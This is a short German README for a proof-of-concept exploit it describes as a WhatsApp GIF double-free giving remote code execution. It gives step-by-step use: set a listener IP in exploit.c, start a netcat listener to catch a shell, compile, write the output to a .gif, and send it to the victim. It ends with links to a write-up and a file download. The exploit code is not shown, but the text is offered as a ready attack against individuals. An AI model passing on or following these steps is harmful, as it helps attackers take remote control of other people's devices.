
Proof-of-Concept-Exploit für CVE-2020-11932, eine Double-Free-Schwachstelle in der GIF-Verarbeitung von WhatsApp, die Remote-Code-Ausführung über eine präparierte .gif-Datei ermöglicht.
Double-Free-Fehler im WhatsApp-Exploit-PoC.
#Hinweis: Stelle sicher, dass du die Listener-IP in der exploit.c setzt, um eine Shell zu erhalten.
nc -lvp 1337 oder beliebiger Port.
und dann kompilieren.
make
oder
gcc -o exploit egif_lib.c exploit.c
dann führe ./exploit aus und speichere den Inhalt in .gif
und sende es an das Opfer.
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
https://drive.google.com/file/d/1XP7K5zkKEhmbEONvRpjrkTQ5pwpBc6G_/view?usp=sharing